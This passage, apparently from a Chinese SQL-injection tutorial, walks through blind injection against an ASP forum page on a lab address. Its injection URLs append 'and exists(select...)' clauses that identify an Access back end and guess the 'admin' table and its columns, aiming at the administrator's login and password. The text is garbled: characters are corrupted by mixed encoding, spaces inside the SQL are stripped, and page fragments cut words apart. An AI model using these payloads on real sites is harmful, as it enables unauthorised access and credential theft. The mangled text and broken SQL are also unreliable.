sql注入攻擊技術(shù)初探

4、數(shù)據(jù)庫(kù)類型也不知道數(shù)據(jù)庫(kù)里面有哪些表、字段等等（類似blackboxtest），一般情況下asp可以與access和mssql數(shù)據(jù)庫(kù)結(jié)合，首先我們來(lái)判斷一下數(shù)據(jù)庫(kù)類型在id參數(shù)后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系統(tǒng)表完整的測(cè)試語(yǔ)句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*frommsysobjects)回車提交到服務(wù)器端如圖，根據(jù)服務(wù)器返回結(jié)果，(MicrosoftJETDatabaseEngine錯(cuò)誤'8

5、0040e09'不能讀取記錄；在'msysobjects'上沒(méi)有讀取數(shù)據(jù)權(quán)限。/bbs/gshow.asp，行11)說(shuō)明存在msysobjects表，也就是說(shuō)后臺(tái)是采用的access數(shù)據(jù)庫(kù)(若服務(wù)器返回[Microsoft][ODBCSQLServerDriver][SQLServer]對(duì)象名'msysobjects'無(wú)效。則說(shuō)明是sqlserver數(shù)據(jù)庫(kù),相關(guān)方法會(huì)在下面講述，這里重點(diǎn)討論access數(shù)據(jù)庫(kù))下面我們來(lái)進(jìn)一步獲取我們想要的信息一般網(wǎng)站重要的信息就是后臺(tái)管理員登陸帳號(hào)密碼了，我們提交http://192.168.80.128:8181/bbs/gshow.

6、asp?id=1andexists(select*fromusers)（判斷數(shù)據(jù)庫(kù)中是否存在users表）根據(jù)圖中返回結(jié)果提示users表不存在，那么我們繼續(xù)來(lái)提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服務(wù)器端返回的數(shù)據(jù)和http://192.168.80.128:8181/bbs/gshow.asp?id=1一樣這是因?yàn)閰?shù)一起帶入數(shù)據(jù)庫(kù)里面就變成了select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在ad

7、min表?xiàng)l件成立就和select*fromgonggaowhereid=1的查詢返回結(jié)果一樣了，找到了admin表現(xiàn)在就以此類推猜測(cè)字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服務(wù)器返回”至少一個(gè)參數(shù)沒(méi)有被指定值”說(shuō)明不存在user字段，繼續(xù)提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectadminfromadmin)服務(wù)器返回正常，說(shuō)明